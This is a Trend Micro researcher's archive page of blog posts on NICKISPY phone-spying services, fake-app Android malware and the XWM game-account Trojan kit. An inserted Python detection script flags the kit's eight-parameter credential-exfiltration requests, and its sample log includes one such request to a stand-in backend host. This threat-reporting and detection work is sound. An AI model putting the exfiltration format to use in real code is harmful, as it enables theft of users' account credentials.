    Author Archive - Lion Gu (Senior Threat Researcher)

    Trend Micro uncovered how cybercriminals may profit from NICKISPY variants. A Chinese website offers mobile phone monitoring tools and services to customers who are given access to the site’s backend to retrieve information. However, such services are not cheap and can cost from US$300–540.

    We’ve been reporting here on the Malware Blog about several NICKISPY variants, Android malware that can monitor a mobile phone user’s activities and whereabouts (SMS, phone calls, and location), and we’ve been curious about how cybercriminals use the stolen private information and earn money from it.

    Now, we have a clear example. We found a Chinese website that offers a mobile phone monitoring service. Once a customer decides to employ the service, he/she gets an account to log in to a backend server of the service, from which information gathered from a target device can be viewed.

    The backend service can be accessed through a portal where the user must first send an MMS that includes malware as an attachment to a victim’s mobile phone number. The malware, once installed on the victim’s mobile phone, will be used to monitor information related to SMS, phone calls, device location, and email messages. Reports are then sent back to the backend service, which can then be accessed by the customer through the portal.

    [Screenshot: configuration page of the backend server’s portal]

    The Remote Receiver Phone Number field holds the phone number that will receive the reports sent by the service, which contain new activity information from the monitored phone. Note that the customer may choose which number will be displayed as the sender of the MMS. Using a number that the victim is familiar with may convince him/her that he/she is receiving a normal MMS, leaving him/her completely unaware that malware was already installed on the device.



    We recently found an Android malware that poses as a variety of applications in a China-based third-party app store.

    The samples we were able to acquire came in the guise of a love test app, an e-book reader, or a location tracker. The permissions these apps request make it immediately noticeable that they do more than they are supposed to.

    This particular Android malware, detected as ANDROIDOS_LUVRTAP.B, automatically executes once an infected Android device is rebooted.



    Recently, my colleagues have been reporting about tools cybercriminals used in their operations. They reported about Twitter spam and botnet kits, fake point-of-sale (POS) devices, and distributed denial-of-service (DDoS) tools. This time, I will share some information about yet another tool, one that specifically affects Chinese online gamers.

    China is well-known for having a huge population of online gamers. In fact, a recently published study stated that there were 68 million gamers in the country in 2009, a number expected to increase to 141 million by 2014.

    Unfortunately, along with these continuing developments in the gaming industry come opportunities for cybercriminals to make money by selling virtual assets extracted from stolen online gaming accounts.

    Just like the tools previously mentioned, Trojan generators are used by cybercriminals to steal online game accounts. “响尾马” (Xian Wei Ma or XWM, which means “rattle Trojan” in Chinese) is a popular Chinese Trojan kit. The main highlight of the XWM Kit is that it not only includes Trojan generators but also a backend server that receives and sorts the stolen information, making its operation really convenient for cybercriminals.

    The XWM Kit includes 21 Trojan generators that target popular online games in China, most of which are local games (see Figure 1).

    [Figure 1: screenshot of the XWM Kit Trojan generators]

    These generators require some configuration before generating a new Trojan. Users need to input the backend server’s URL in order to receive stolen information sent by the Trojan.

    [Screenshot: generator configuration dialog with the backend server URL field]

    Once executed on a victim’s system, the generated Trojan will drop the following files:

    • %system32%\{4 random characters}.dll
    • %system32%\{4 random characters}.cfg
    • %system32%\drivers\msacpe.sys

    The .DLL file is loaded into the system’s memory and is used to steal account information as well as to send that information back to the backend server using the following string as a URL argument:


    The above-mentioned argument has eight variables, which are used to send back stolen information to the backend server. The variables in the argument are defined as:

    • ‘a’ — area of online game server
    • ‘s’ — server name
    • ‘u’ — user name
    • ‘p’ — password
    • ‘r’ — role
    • ‘l’ — level
    • ‘m’ — virtual money
    • ‘pin’ — PIN code

    The stolen information is then sent to the backend server URL, which is contained in the .CFG file. The cybercriminals then access the backend server, which stores all the stolen information, through a specially developed home page.

    [Screenshot: home page of the backend server listing stolen account information]
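    The eight parameter names above are a usable detection signature on the network side. The following is an added example, not code from the Trend Micro post or from the XWM Kit: a small scanner that reads proxy log lines and flags requests whose query string carries all eight keys at once. It assumes the Trojan's report travels as an HTTP GET with those keys in the query string (the post's exact URL string is not reproduced here); the log format, client addresses and the host name backend.invalid are constructed for the example. Values of the password and PIN fields are masked in the alert so the triage output does not redistribute the stolen credentials.

```python
"""Flag XWM-style exfiltration requests in web proxy logs.

Added example, not code from the Trend Micro post or from the XWM Kit.
Assumption: the Trojan's report reaches the backend as an HTTP GET whose
query string carries the eight keys the post lists (a, s, u, p, r, l, m, pin).
The log format, client addresses and the host backend.invalid are constructed.
"""
from __future__ import annotations

from urllib.parse import parse_qs, urlsplit

# Query-string keys the post attributes to the XWM Trojan's URL argument.
XWM_KEYS = frozenset({"a", "s", "u", "p", "r", "l", "m", "pin"})

# Constructed sample proxy log lines: "<epoch> <client-ip> <method> <url>".
# Line 2 is the only one that carries the full XWM key set; line 3 shares
# a few short keys (u, p, l) with it and must not be flagged.
SAMPLE_LOG = """\
1314000001.123 10.0.0.5 GET http://search.example.com/?q=online+game
1314000002.456 10.0.0.7 GET http://backend.invalid/post.asp?a=huabei&s=srv03&u=player01&p=pass1234&r=warrior&l=45&m=120000&pin=1234
1314000003.789 10.0.0.9 GET http://shop.example.com/cart?u=guest&p=none&l=1
1314000004.012 10.0.0.7 POST http://mail.example.com/send
"""


def is_xwm_exfil(url: str) -> bool:
    """Return True when the URL's query string contains every XWM key.

    Matching on the whole key set, rather than on individual one-letter
    names, keeps ordinary requests that happen to use u= or p= from firing.
    keep_blank_values=True so that empty fields (e.g. an account with no
    PIN set) still count as present.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return XWM_KEYS.issubset(query.keys())


def find_exfil_requests(log_text: str) -> list[dict[str, str]]:
    """Scan proxy log lines and return one record per suspected exfil request.

    Each record keeps what an analyst needs for triage (time, client,
    destination host, game area/server, account name) and masks the
    password and PIN values so the alert itself does not spread them.
    """
    hits: list[dict[str, str]] = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed or truncated line: skip rather than crash
        timestamp, client, _method, url = fields[:4]
        if not is_xwm_exfil(url):
            continue
        query = parse_qs(urlsplit(url).query, keep_blank_values=True)

        def first(key: str) -> str:
            # parse_qs returns a list per key; the Trojan sends each once.
            return query.get(key, [""])[0]

        hits.append({
            "timestamp": timestamp,
            "client": client,
            "backend_host": urlsplit(url).hostname or "",
            "game_area": first("a"),
            "game_server": first("s"),
            "account": first("u"),
            "password": "***" if first("p") else "",
            "pin": "***" if first("pin") else "",
        })
    return hits


if __name__ == "__main__":
    for hit in find_exfil_requests(SAMPLE_LOG):
        print(hit)
```

    In practice the backend host taken from each hit is the value worth pivoting on: every infected machine in the estate reports to the URL baked into the generator's .CFG file, so one confirmed hit gives a destination to block and to search for across the rest of the proxy history.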

    The cybercriminals selling this tool even provided a demo page where a list of supposedly stolen information is displayed, showing just how effective the tool is.

    [Screenshot: demo page listing supposedly stolen information]

    The danger in all this lies not only in the attacks that the tool kit can instigate but also in its availability. The more people who use the toolkit, the more people can be victimized, and the more cybercriminals will be motivated to conduct their own operations. This proves yet again how technology can make many things convenient for us while unfortunately doing the same for cybercriminals.

    XWM Kit: A Popular Chinese Online Gaming Trojan Kit. Posted in Bad Sites, Botnets, Malware.


    © Copyright 2013 Trend Micro Inc. All rights reserved.